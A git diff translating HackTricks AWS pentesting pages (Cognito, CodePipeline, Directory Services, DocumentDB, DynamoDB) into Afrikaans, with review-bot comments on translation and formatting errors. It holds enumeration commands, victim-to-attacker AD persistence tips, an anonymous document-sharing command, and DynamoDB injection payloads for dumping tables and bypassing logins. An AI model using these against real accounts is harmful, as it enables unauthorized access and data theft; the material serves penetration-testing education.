-The **roles** a user have access to are **inside the `IdToken`**, and a user can **select which role he would like credentials for** with the **`--custom-role-arn`** from `aws cognito-identity get-credentials-for-identity`.\ -However, if the **default option** is the one **configured** (`use default role`), and you try to access a role from the IdToken, you will get **error** (that's why the previous configuration is needed): - +Die **rolle** waartoe 'n gebruiker toegang het, is **binne die `IdToken`**, en 'n gebruiker kan **kies watter rol hy graag geloofsbriewe vir** wil hĂȘ met die **`--custom-role-arn`** van `aws cognito-identity get-credentials-for-identity`.\ +As die **standaard opsie** egter die een is wat **gekonfigureer** is (`use default role`), en jy probeer om toegang te verkry tot 'n rol vanaf die IdToken, sal jy **fout** kry (dit is waarom die vorige konfigurasie nodig is): ``` An error occurred (InvalidParameterException) when calling the GetCredentialsForIdentity operation: Only SAML providers and providers with RoleMappings support custom role ARN. ``` - > [!WARNING] -> Note that the role assigned to a **User Pool Group** needs to be **accesible by the Identity Provider** that **trust the User Pool** (as the IAM role **session credentials are going to be obtained from it**). - +> Let daarop dat die rol wat aan 'n **User Pool Group** toegeken is, **toeganklik moet wees deur die Identiteitsverskaffer** wat **die User Pool vertrou** (aangesien die IAM-rol **sessie-inligting daaruit verkry gaan word**). 
```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "Federated": "cognito-identity.amazonaws.com" - }, - "Action": "sts:AssumeRoleWithWebIdentity", - "Condition": { - "StringEquals": { - "cognito-identity.amazonaws.com:aud": "us-east-1:2361092e-9db6-a876-1027-10387c9de439" - }, - "ForAnyValue:StringLike": { - "cognito-identity.amazonaws.com:amr": "authenticated" - } - } - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"Federated": "cognito-identity.amazonaws.com" +}, +"Action": "sts:AssumeRoleWithWebIdentity", +"Condition": { +"StringEquals": { +"cognito-identity.amazonaws.com:aud": "us-east-1:2361092e-9db6-a876-1027-10387c9de439" +}, +"ForAnyValue:StringLike": { +"cognito-identity.amazonaws.com:amr": "authenticated" +} +} +} +] }js ``` - {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md b/src/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md index 2a907b71b..059899a28 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md 
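Review bot: the `+` lines of the Python block in the `@@ -414,83 +371,74 @@` hunk of the Cognito page drop all indentation inside `def refresh(...)` (`+try:`, `+return boto_client.initiate_auth(`, `+except botocore.exceptions.ClientError as e:`), which turns working code into an IndentationError; the translation should only touch prose, so restore the original four-space indentation of the function body. The same stripping hits the JSON trust policy (harmless for JSON), but the block still ends in the pre-existing `}js` before the closing fence, which makes the `json` block invalid and could be corrected to `}` while the block is being touched. Two points on the prose of the same hunk: "credentials" is rendered as `geloofsbriewe` in the User Pool Groups paragraph but as `sessie-inligting` (session information) in the `[!WARNING]` callout, so pick one term; and the callout says the role must be accessible by the "Identiteitsverskaffer wat die User Pool vertrou", while the trust policy under it is keyed on `cognito-identity.amazonaws.com:aud` (an Identity Pool ID) and the paragraph above says the User Pool must be trusted by an Identity Pool, so "Identity Pool" appears to be what is meant, in both the English and the Afrikaans.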
@@ -4,30 +4,28 @@ ## DataPipeline -AWS Data Pipeline is designed to facilitate the **access, transformation, and efficient transfer** of data at scale. It allows the following operations to be performed: +AWS Data Pipeline is ontwerp om die **toegang, transformasie, en doeltreffende oordrag** van data op skaal te fasiliteer. Dit laat die volgende operasies toe: -1. **Access Your Data Where It’s Stored**: Data residing in various AWS services can be accessed seamlessly. -2. **Transform and Process at Scale**: Large-scale data processing and transformation tasks are handled efficiently. -3. **Efficiently Transfer Results**: The processed data can be efficiently transferred to multiple AWS services including: - - Amazon S3 - - Amazon RDS - - Amazon DynamoDB - - Amazon EMR +1. **Toegang tot Jou Data Waar Dit Gestoor Is**: Data wat in verskeie AWS-dienste woon, kan naatloos verkry word. +2. **Transformeer en Verwerk op Skaal**: Grootmaat data verwerking en transformasie take word doeltreffend hanteer. +3. **Doeltreffend Oordrag van Resultate**: Die verwerkte data kan doeltreffend oorgedra word na verskeie AWS-dienste insluitend: +- Amazon S3 +- Amazon RDS +- Amazon DynamoDB +- Amazon EMR -In essence, AWS Data Pipeline streamlines the movement and processing of data between different AWS compute and storage services, as well as on-premises data sources, at specified intervals. +In wese stroomlyn AWS Data Pipeline die beweging en verwerking van data tussen verskillende AWS reken- en stoor dienste, sowel as op-premises data bronne, op gespesifiseerde tydperke. 
### Enumeration - ```bash aws datapipeline list-pipelines aws datapipeline describe-pipelines --pipeline-ids aws datapipeline list-runs --pipeline-id aws datapipeline get-pipeline-definition --pipeline-id ``` - ### Privesc -In the following page you can check how to **abuse datapipeline permissions to escalate privileges**: +In die volgende bladsy kan jy kyk hoe om **datapipeline-toestemmings te misbruik om voorregte te verhoog**: {{#ref}} ../aws-privilege-escalation/aws-datapipeline-privesc.md @@ -35,10 +33,9 @@ In the following page you can check how to **abuse datapipeline permissions to e ## CodePipeline -AWS CodePipeline is a fully managed **continuous delivery service** that helps you **automate your release pipelines** for fast and reliable application and infrastructure updates. CodePipeline automates the **build, test, and deploy phases** of your release process every time there is a code change, based on the release model you define. +AWS CodePipeline is 'n volledig bestuurde **deurlopende afleweringsdiens** wat jou help om **jou vrystellingspype te outomatiseer** vir vinnige en betroubare toepassings- en infrastruktuuropdaterings. CodePipeline outomatiseer die **bou, toets, en ontplooi fases** van jou vrystellingsproses elke keer daar 'n kodeverandering is, gebaseer op die vrystellingsmodel wat jy definieer. ### Enumeration - ```bash aws codepipeline list-pipelines aws codepipeline get-pipeline --name @@ -47,10 +44,9 @@ aws codepipeline list-pipeline-executions --pipeline-name aws codepipeline list-webhooks aws codepipeline get-pipeline-state --name ``` - ### Privesc -In the following page you can check how to **abuse codepipeline permissions to escalate privileges**: +In die volgende bladsy kan jy kyk hoe om **kodepypel-regte te misbruik om voorregte te verhoog**: {{#ref}} ../aws-privilege-escalation/aws-codepipeline-privesc.md 
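Review bot: in the numbered list of the `@@ -4,30 +4,28 @@` hunk the four sub-bullets under item 3 (`+- Amazon S3`, `+- Amazon RDS`, `+- Amazon DynamoDB`, `+- Amazon EMR`) lost their leading spaces, so they are no longer nested under "Doeltreffend Oordrag van Resultate" and will render as a separate top-level list after the numbered one; keep the two-space indent on those `-` lines (and "Doeltreffend Oordrag" should be "Doeltreffende Oordrag" to agree with the noun). In the `@@ -47,10 +44,9 @@` hunk the Privesc line translates the service name, "kodepypel-regte te misbruik" for "abuse codepipeline permissions"; service names are proper nouns and are left untranslated everywhere else in the patch, and the DataPipeline hunk above keeps `datapipeline-toestemmings`, so this should read `codepipeline-toestemmings` ("regte" and "toestemmings" are now both used for "permissions"; choose one).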
@@ -58,12 +54,11 @@ In the following page you can check how to **abuse codepipeline permissions to e ## CodeCommit -It is a **version control service**, which is hosted and fully managed by Amazon, which can be used to privately store data (documents, binary files, source code) and manage them in the cloud. +Dit is 'n **weergawebeheerdiens**, wat gehos en ten volle bestuur word deur Amazon, wat gebruik kan word om data (dokumente, binĂȘre lĂȘers, bronkode) privaat te stoor en dit in die wolk te bestuur. -It **eliminates** the requirement for the user to know Git and **manage their own source control system** or worry about scaling up or down their infrastructure. Codecommit supports all the standard **functionalities that can be found in Git**, which means it works effortlessly with user’s current Git-based tools. +Dit **verwyder** die vereiste dat die gebruiker Git moet ken en **hulle eie bronbeheerstelsel moet bestuur** of bekommerd wees oor die skaal van hul infrastruktuur. Codecommit ondersteun al die standaard **funksies wat in Git gevind kan word**, wat beteken dit werk moeiteloos saam met die gebruiker se huidige Git-gebaseerde gereedskap. ### Enumeration - ```bash # Repos aws codecommit list-repositories @@ -95,13 +90,8 @@ ssh-keygen -f .ssh/id_rsa -l -E md5 # Clone repo git clone ssh://@git-codecommit..amazonaws.com/v1/repos/ ``` - -## References +## Verwysings - [https://docs.aws.amazon.com/whitepapers/latest/aws-overview/analytics.html](https://docs.aws.amazon.com/whitepapers/latest/aws-overview/analytics.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md index 93992174c..46db343d9 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md 
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md 
@@ -4,26 +4,25 @@ ## Directory Services -AWS Directory Service for Microsoft Active Directory is a managed service that makes it easy to **set up, operate, and scale a directory** in the AWS Cloud. It is built on actual **Microsoft Active Directory** and integrates tightly with other AWS services, making it easy to manage your directory-aware workloads and AWS resources. With AWS Managed Microsoft AD, you can **use your existing** Active Directory users, groups, and policies to manage access to your AWS resources. This can help simplify your identity management and reduce the need for additional identity solutions. AWS Managed Microsoft AD also provides automatic backups and disaster recovery capabilities, helping to ensure the availability and durability of your directory. Overall, AWS Directory Service for Microsoft Active Directory can help you save time and resources by providing a managed, highly available, and scalable Active Directory service in the AWS Cloud. +AWS Directory Service for Microsoft Active Directory is 'n bestuurde diens wat dit maklik maak om 'n **directory op te stel, te bedryf en te skaal** in die AWS Cloud. Dit is gebou op werklike **Microsoft Active Directory** en integreer noukeurig met ander AWS-dienste, wat dit maklik maak om jou directory-bewuste werklading en AWS-hulpbronne te bestuur. Met AWS Managed Microsoft AD kan jy **jou bestaande** Active Directory gebruikers, groepe en beleide gebruik om toegang tot jou AWS-hulpbronne te bestuur. Dit kan help om jou identiteitsbestuur te vereenvoudig en die behoefte aan addisionele identiteitsoplossings te verminder. AWS Managed Microsoft AD bied ook outomatiese rugsteun en rampherstelvermoĂ«ns, wat help om die beskikbaarheid en duursaamheid van jou directory te verseker. Oor die algemeen kan AWS Directory Service for Microsoft Active Directory jou help om tyd en hulpbronne te bespaar deur 'n bestuurde, hoogs beskikbare en skaalbare Active Directory-diens in die AWS Cloud te bied. 
### Options -Directory Services allows to create 5 types of directories: +Directory Services laat jou toe om 5 tipes directories te skep: -- **AWS Managed Microsoft AD**: Which will run a new **Microsoft AD in AWS**. You will be able to set the admin password and access the DCs in a VPC. -- **Simple AD**: Which will be a **Linux-Samba** Active Directory–compatible server. You will be able to set the admin password and access the DCs in a VPC. -- **AD Connector**: A proxy for **redirecting directory requests to your existing Microsoft Active Directory** without caching any information in the cloud. It will be listening in a **VPC** and you need to give **credentials to access the existing AD**. -- **Amazon Cognito User Pools**: This is the same as Cognito User Pools. -- **Cloud Directory**: This is the **simplest** one. A **serverless** directory where you indicate the **schema** to use and are **billed according to the usage**. +- **AWS Managed Microsoft AD**: Wat 'n nuwe **Microsoft AD in AWS** sal laat loop. Jy sal in staat wees om die admin wagwoord in te stel en toegang tot die DC's in 'n VPC te verkry. +- **Simple AD**: Wat 'n **Linux-Samba** Active Directory–kompatible bediener sal wees. Jy sal in staat wees om die admin wagwoord in te stel en toegang tot die DC's in 'n VPC te verkry. +- **AD Connector**: 'n proxy vir **om directory versoeke na jou bestaande Microsoft Active Directory te herlei** sonder om enige inligting in die wolk te kas. Dit sal in 'n **VPC** luister en jy moet **akkrediteer om toegang tot die bestaande AD te verkry**. +- **Amazon Cognito User Pools**: Dit is dieselfde as Cognito User Pools. +- **Cloud Directory**: Dit is die **simpele** een. 'n **serverless** directory waar jy die **schema** aandui om te gebruik en jy word **gefactureer volgens die gebruik**. -AWS Directory services allows to **synchronise** with your existing **on-premises** Microsoft AD, **run your own one** in AWS or synchronize with **other directory types**. 
+AWS Directory services laat jou toe om te **synchroniseer** met jou bestaande **on-premises** Microsoft AD, **jou eie een** in AWS te laat loop of te synchroniseer met **ander directory tipes**. ### Lab -Here you can find a nice tutorial to create you own Microsoft AD in AWS: [https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html) +Hier kan jy 'n lekker tutoriaal vind om jou eie Microsoft AD in AWS te skep: [https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html) ### Enumeration - ```bash # Get directories and DCs aws ds describe-directories @@ -36,10 +35,9 @@ aws ds get-directory-limits aws ds list-certificates --directory-id aws ds describe-certificate --directory-id --certificate-id ``` - ### Login -Note that if the **description** of the directory contained a **domain** in the field **`AccessUrl`** it's because a **user** can probably **login** with its **AD credentials** in some **AWS services:** +Let daarop dat as die **beskrywing** van die gids 'n **domein** in die veld **`AccessUrl`** bevat, dit is omdat 'n **gebruiker** waarskynlik kan **aanmeld** met sy **AD-akkrediteer** in sommige **AWS-dienste:** - `.awsapps.com/connect` (Amazon Connect) - `.awsapps.com/workdocs` (Amazon WorkDocs) 
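Review bot: several items in the Options list of the `@@ -4,26 +4,25 @@` hunk are mistranslated rather than merely awkward. "'n proxy vir **om directory versoeke ... te herlei**" is ungrammatical ("'n proxy om ... te herlei"); "jy moet **akkrediteer om toegang tot die bestaande AD te verkry**" turns the noun "credentials" into the verb "to accredit" and loses the meaning of "you need to give credentials to access the existing AD" (e.g. "jy moet geloofsbriewe verskaf om ..."); "Dit is die **simpele** een" means "the simple-minded one" where "eenvoudigste" is intended; "gefactureer" is Dutch, Afrikaans is "gefaktureer"; and "integreer noukeurig" ("integrates meticulously") for "integrates tightly" should be "integreer nou met". The Login note in the `@@ -36,10 +35,9 @@` hunk repeats the "akkrediteer" problem ("met sy **AD-akkrediteer**" should be a noun such as "AD-geloofsbriewe", matching the Cognito page earlier in this patch) and its main clause needs inversion after the subordinate clause: "..., is dit omdat 'n gebruiker waarskynlik met sy AD-geloofsbriewe by sommige AWS-dienste kan aanmeld:" rather than "..., dit is omdat ...".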
@@ -57,30 +55,29 @@ Note that if the **description** of the directory contained a **domain** in the ### Using an AD user -An **AD user** can be given **access over the AWS management console** via a Role to assume. The **default username is Admin** and it's possible to **change its password** from AWS console. +'n **AD-gebruiker** kan **toegang oor die AWS-bestuurskonsol** gegee word via 'n Rol om aan te neem. Die **standaard gebruikersnaam is Admin** en dit is moontlik om **sy wagwoord te verander** vanaf die AWS-konsol. -Therefore, it's possible to **change the password of Admin**, **create a new user** or **change the password** of a user and grant that user a Role to maintain access.\ -It's also possible to **add a user to a group inside AD** and **give that AD group access to a Role** (to make this persistence more stealth). +Daarom is dit moontlik om **die wagwoord van Admin te verander**, **'n nuwe gebruiker te skep** of **die wagwoord** van 'n gebruiker te verander en daardie gebruiker 'n Rol te gee om toegang te behou.\ +Dit is ook moontlik om **'n gebruiker aan 'n groep binne AD toe te voeg** en **daardie AD-groep toegang tot 'n Rol te gee** (om hierdie volharding meer stil te maak). ### Sharing AD (from victim to attacker) -It's possible to share an AD environment from a victim to an attacker. This way the attacker will be able to continue accessing the AD env.\ -However, this implies sharing the managed AD and also creating an VPC peering connection. +Dit is moontlik om 'n AD-omgewing van 'n slagoffer na 'n aanvaller te deel. Op hierdie manier sal die aanvaller in staat wees om voort te gaan om toegang tot die AD-omgewing te verkry.\ +Dit impliseer egter die deel van die bestuurde AD en ook die skep van 'n VPC-peeringverbinding. 
-You can find a guide here: [https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1_setup_networking.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1_setup_networking.html) +Jy kan 'n gids hier vind: [https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1_setup_networking.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1_setup_networking.html) ### ~~Sharing AD (from attacker to victim)~~ -It doesn't look like possible to grant AWS access to users from a different AD env to one AWS account. +Dit lyk nie moontlik om AWS-toegang aan gebruikers van 'n ander AD-omgewing te gee nie, na een AWS-rekening. ## WorkDocs -Amazon Web Services (AWS) WorkDocs is a cloud-based **file storage and sharing service**. It is part of the AWS suite of cloud computing services and is designed to provide a secure and scalable solution for organizations to store, share, and collaborate on files and documents. +Amazon Web Services (AWS) WorkDocs is 'n wolk-gebaseerde **lĂȘeropslag en deel diens**. Dit is deel van die AWS-suite van wolkrekenaarsdienste en is ontwerp om 'n veilige en skaalbare oplossing te bied vir organisasies om lĂȘers en dokumente te stoor, te deel en saam te werk. -AWS WorkDocs provides a web-based interface for users to upload, access, and manage their files and documents. It also offers features such as version control, real-time collaboration, and integration with other AWS services and third-party tools. +AWS WorkDocs bied 'n web-gebaseerde koppelvlak vir gebruikers om hul lĂȘers en dokumente op te laai, toegang te verkry en te bestuur. Dit bied ook funksies soos weergawebeheer, regstreekse samewerking, en integrasie met ander AWS-dienste en derdeparty gereedskap. ### Enumeration - ```bash # Get AD users (Admin not included) aws workdocs describe-users --organization-id 
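Review bot: the sentence under "~~Sharing AD (from attacker to victim)~~" in the `@@ -57,30 +55,29 @@` hunk is garbled: "Dit lyk nie moontlik om AWS-toegang aan gebruikers van 'n ander AD-omgewing te gee nie, na een AWS-rekening" tacks "to one AWS account" on after the closing "nie", so the phrase no longer attaches to anything. Suggest "Dit lyk nie moontlik om gebruikers van 'n ander AD-omgewing toegang tot 'n AWS-rekening te gee nie." Smaller points in the same hunk: "AWS-bestuurskonsol" should be "AWS-bestuurskonsole", and "sal die aanvaller in staat wees om voort te gaan om toegang tot die AD-omgewing te verkry" is a word-for-word rendering that reads more naturally as "sal die aanvaller steeds toegang tot die AD-omgewing hĂȘ".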
@@ -109,7 +106,6 @@ aws workdocs describe-resource-permissions --resource-id aws workdocs add-resource-permissions --resource-id --principals Id=anonymous,Type=ANONYMOUS,Role=VIEWER ## This will give an id, the file will be acesible in: https://.awsapps.com/workdocs/index.html#/share/document/ ``` - ### Privesc {{#ref}} @@ -117,7 +113,3 @@ aws workdocs add-resource-permissions --resource-id --principals Id=anonymo {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md index caf35d03c..96f537353 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md 
@@ -4,10 +4,9 @@ ## DocumentDB -Amazon DocumentDB, offering compatibility with MongoDB, is presented as a **fast, reliable, and fully managed database service**. Designed for simplicity in deployment, operation, and scalability, it allows the **seamless migration and operation of MongoDB-compatible databases in the cloud**. Users can leverage this service to execute their existing application code and utilize familiar drivers and tools, ensuring a smooth transition and operation akin to working with MongoDB. +Amazon DocumentDB, wat kompatibiliteit met MongoDB bied, word aangebied as 'n **vinnige, betroubare en volledig bestuurde databasediens**. Ontwerp vir eenvoud in implementering, werking en skaalbaarheid, dit stel gebruikers in staat om die **naadlose migrasie en werking van MongoDB-kompatible databases in die wolk** te doen. Gebruikers kan hierdie diens benut om hul bestaande toepassingskode uit te voer en bekende bestuurders en gereedskap te gebruik, wat 'n gladde oorgang en werking soos met MongoDB verseker. ### Enumeration - ```bash aws docdb describe-db-clusters # Get username from "MasterUsername", get also the endpoint from "Endpoint" aws docdb describe-db-instances #Get hostnames from here @@ -20,10 +19,9 @@ aws docdb describe-db-cluster-parameters --db-cluster-parameter-group-name ``` - ### NoSQL Injection -As DocumentDB is a MongoDB compatible database, you can imagine it's also vulnerable to common NoSQL injection attacks: +Aangesien DocumentDB 'n MongoDB-ondersteunde databasis is, kan jy jou voorstel dat dit ook kwesbaar is vir algemene NoSQL-inspuitaanvalle: {{#ref}} https://book.hacktricks.xyz/pentesting-web/nosql-injection 
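Review bot: two mistranslations in the `@@ -4,10 +4,9 @@` hunk of the DocumentDB page change meaning. "MongoDB-ondersteunde databasis" (MongoDB-supported) in the NoSQL Injection paragraph should be "MongoDB-versoenbare databasis", in line with "kompatibiliteit met MongoDB" in the first paragraph; and "bekende bestuurders en gereedskap" renders "familiar drivers" with the word for managers or vehicle drivers, where database drivers are "drywers". "MongoDB-kompatible" in the first paragraph should also become "MongoDB-versoenbare" (or at least "kompatibele") so the page uses one form.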
@@ -40,7 +38,3 @@ https://book.hacktricks.xyz/pentesting-web/nosql-injection - [https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/](https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md index cb0864715..ab95e7d8d 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md 
@@ -4,30 +4,29 @@ ## DynamoDB -### Basic Information +### Basiese Inligting -Amazon DynamoDB is presented by AWS as a **fully managed, serverless, key-value NoSQL database**, tailored for powering high-performance applications regardless of their size. The service ensures robust features including inherent security measures, uninterrupted backups, automated replication across multiple regions, integrated in-memory caching, and convenient data export utilities. +Amazon DynamoDB word deur AWS aangebied as 'n **volledig bestuurde, serverless, sleutel-waarde NoSQL-databasis**, ontwerp om hoĂ«-prestasie toepassings te ondersteun, ongeag hul grootte. Die diens verseker robuuste kenmerke, insluitend ingeboude sekuriteitsmaatreĂ«ls, ononderbroken rugsteun, geoutomatiseerde replikaasies oor verskeie streke, geĂŻntegreerde in-geheue kas, en gerieflike data-uitvoerhulpmiddels. -In the context of DynamoDB, instead of establishing a traditional database, **tables are created**. Each table mandates the specification of a **partition key** as an integral component of the **table's primary key**. This partition key, essentially a **hash value**, plays a critical role in both the retrieval of items and the distribution of data across various hosts. This distribution is pivotal for maintaining both scalability and availability of the database. Additionally, there's an option to incorporate a **sort key** to further refine data organization. +In die konteks van DynamoDB, in plaas daarvan om 'n tradisionele databasis op te stel, **word tafels geskep**. Elke tafel vereis die spesifikasie van 'n **partisie-sleutel** as 'n integrale komponent van die **tafel se primĂȘre sleutel**. Hierdie partisiesleutel, wat essensieel 'n **hash-waarde** is, speel 'n kritieke rol in beide die herwinning van items en die verspreiding van data oor verskeie gasheers. Hierdie verspreiding is van kardinale belang om beide skaalbaarheid en beskikbaarheid van die databasis te handhaaf. 
Daar is ook 'n opsie om 'n **sorteersleutel** in te sluit om data-organisasie verder te verfyn. -### Encryption +### Enkripsie -By default, DynamoDB uses a KMS key that \*\*belongs to Amazon DynamoDB,\*\*not even the AWS managed key that at least belongs to your account. +Standaard gebruik DynamoDB 'n KMS-sleutel wat \*\*aan Amazon DynamoDB behoort,\*\* nie eens die AWS bestuurde sleutel wat ten minste aan jou rekening behoort nie.
-### Backups & Export to S3 +### Rugsteun & Uitvoer na S3 -It's possible to **schedule** the generation of **table backups** or create them on **demand**. Moreover, it's also possible to enable **Point-in-time recovery (PITR) for a table.** Point-in-time recovery provides continuous **backups** of your DynamoDB data for **35 days** to help you protect against accidental write or delete operations. +Dit is moontlik om die generering van **tafelrugsteun** te **skeduleer** of dit op **aanvraag** te skep. Boonop is dit ook moontlik om **Punt-in-tyd herstel (PITR) vir 'n tafel** in te skakel. Punt-in-tyd herstel bied deurlopende **rugsteun** van jou DynamoDB-data vir **35 dae** om jou te help beskerm teen per ongeluk skryf- of verwyderingsoperasies. -It's also possible to export **the data of a table to S3**, but the table needs to have **PITR enabled**. +Dit is ook moontlik om **die data van 'n tafel na S3 uit te voer**, maar die tafel moet **PITR geaktiveer** hĂȘ. ### GUI -There is a GUI for local Dynamo services like [DynamoDB Local](https://aws.amazon.com/blogs/aws/dynamodb-local-for-desktop-development/), [dynalite](https://github.com/mhart/dynalite), [localstack](https://github.com/localstack/localstack), etc, that could be useful: [https://github.com/aaronshaf/dynamodb-admin](https://github.com/aaronshaf/dynamodb-admin) - -### Enumeration +Daar is 'n GUI vir plaaslike Dynamo-dienste soos [DynamoDB Local](https://aws.amazon.com/blogs/aws/dynamodb-local-for-desktop-development/), [dynalite](https://github.com/mhart/dynalite), [localstack](https://github.com/localstack/localstack), ens., wat nuttig kan wees: [https://github.com/aaronshaf/dynamodb-admin](https://github.com/aaronshaf/dynamodb-admin) +### Enumerasie ```bash # Tables aws dynamodb list-tables 
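Review bot: the `@@ -4,30 +4,29 @@` hunk of the DynamoDB page translates "table" as "tafel/tafels" throughout the Basic Information and Backups sections, which is the word for a piece of furniture; a database table is "tabel/tabelle", and the NoSQL Injection hunk later in this same file already says "die hele tabel dump", so the page ends up with both. Also "geoutomatiseerde replikaasies" should be "replikasie", and the heading is translated to "### Enumerasie" here while the identical heading is left as "### Enumeration" in the DataPipeline, CodePipeline, CodeCommit, Directory Services, WorkDocs and DocumentDB files of this patch; pick one and apply it everywhere.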
@@ -36,7 +35,7 @@ aws dynamodb describe-table --table-name #Get metadata info #Check if point in time recovery is enabled aws dynamodb describe-continuous-backups \ - --table-name tablename +--table-name tablename # Backups aws dynamodb list-backups 
@@ -54,129 +53,112 @@ aws dynamodb describe-export --export-arn # Misc aws dynamodb describe-endpoints #Dynamodb endpoints ``` - -### Unauthenticated Access +### Ongeauthentiseerde Toegang {{#ref}} ../aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md {{#endref}} -### Privesc +### Privilege Verhoging {{#ref}} ../aws-privilege-escalation/aws-dynamodb-privesc.md {{#endref}} -### Post Exploitation +### Post Exploitatie {{#ref}} ../aws-post-exploitation/aws-dynamodb-post-exploitation.md {{#endref}} -### Persistence +### Volharding {{#ref}} ../aws-persistence/aws-dynamodb-persistence.md {{#endref}} -## DynamoDB Injection +## DynamoDB Inspuiting -### SQL Injection +### SQL Inspuiting -There are ways to access DynamoDB data with **SQL syntax**, therefore, typical **SQL injections are also possible**. +Daar is maniere om toegang tot DynamoDB-data te verkry met **SQL-sintaksis**, daarom is tipiese **SQL-inspuitings ook moontlik**. {{#ref}} https://book.hacktricks.xyz/pentesting-web/sql-injection {{#endref}} -### NoSQL Injection +### NoSQL Inspuiting -In DynamoDB different **conditions** can be used to retrieve data, like in a common NoSQL Injection if it's possible to **chain more conditions to retrieve** data you could obtain hidden data (or dump the whole table).\ -You can find here the conditions supported by DynamoDB: [https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html) +In DynamoDB kan verskillende **voorwaardes** gebruik word om data te verkry, soos in 'n algemene NoSQL-inspuiting. 
As dit moontlik is om **meer voorwaardes te koppel om** data te verkry, kan jy verborge data verkry (of die hele tabel dump).\ +Jy kan hier die voorwaardes vind wat deur DynamoDB ondersteun word: [https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html) -Note that **different conditions** are supported if the data is being accessed via **`query`** or via **`scan`**. +Let daarop dat **verskillende voorwaardes** ondersteun word as die data via **`query`** of via **`scan`** verkry word. > [!NOTE] -> Actually, **Query** actions need to specify the **condition "EQ" (equals)** in the **primary** key to works, making it much **less prone to NoSQL injections** (and also making the operation very limited). - -If you can **change the comparison** performed or add new ones, you could retrieve more data. +> Trouens, **Query** aksies moet die **voorwaarde "EQ" (gelyk)** in die **primĂȘre** sleutel spesifiseer om te werk, wat dit baie **minder geneig maak tot NoSQL-inspuitings** (en ook die operasie baie beperk maak). +As jy die **vergelyking** wat uitgevoer word kan **verander** of nuwe kan byvoeg, kan jy meer data verkry. ```bash # Comparators to dump the database "NE": "a123" #Get everything that doesn't equal "a123" "NOT_CONTAINS": "a123" #What you think "GT": " " #All strings are greater than a space ``` - {{#ref}} https://book.hacktricks.xyz/pentesting-web/nosql-injection {{#endref}} -### Raw Json injection +### Rauwe Json-inspuiting > [!CAUTION] -> **This vulnerability is based on dynamodb Scan Filter which is now deprecated!** +> **Hierdie kwesbaarheid is gebaseer op dynamodb Scan Filter wat nou verouderd is!** -**DynamoDB** accepts **Json** objects to **search** for data inside the DB. If you find that you can write in the json object sent to search, you could make the DB dump, all the contents. 
- -For example, injecting in a request like: +**DynamoDB** aanvaar **Json**-objekte om **data** binne die DB te **soek**. As jy vind dat jy in die json-objek wat gestuur word om te soek, kan skryf, kan jy die DB dump, al die inhoud. +Byvoorbeeld, inspuiting in 'n versoek soos: ```bash '{"Id": {"ComparisonOperator": "EQ","AttributeValueList": [{"N": "' + user_input + '"}]}}' ``` - -an attacker could inject something like: +'n aanvaller kan iets soos injecteer: `1000"}],"ComparisonOperator": "GT","AttributeValueList": [{"N": "0` -fix the "EQ" condition searching for the ID 1000 and then looking for all the data with a Id string greater and 0, which is all. - -Another **vulnerable example using a login** could be: +regstel die "EQ" voorwaarde wat soek na die ID 1000 en dan soek na al die data met 'n Id-string groter as 0, wat alles is. +Nog 'n **kwetsbare voorbeeld wat 'n aanmelding gebruik** kan wees: ```python scan_filter = """{ - "username": { - "ComparisonOperator": "EQ", - "AttributeValueList": [{"S": "%s"}] - }, - "password": { - "ComparisonOperator": "EQ", - "AttributeValueList": [{"S": "%s"}] - } +"username": { +"ComparisonOperator": "EQ", +"AttributeValueList": [{"S": "%s"}] +}, +"password": { +"ComparisonOperator": "EQ", +"AttributeValueList": [{"S": "%s"}] +} } """ % (user_data['username'], user_data['password']) dynamodb.scan(TableName="table-name", ScanFilter=json.loads(scan_filter)) ``` - -This would be vulnerable to: - +Dit sou kwesbaar wees vir: ``` username: none"}],"ComparisonOperator": "NE","AttributeValueList": [{"S": "none password: none"}],"ComparisonOperator": "NE","AttributeValueList": [{"S": "none ``` - ### :property 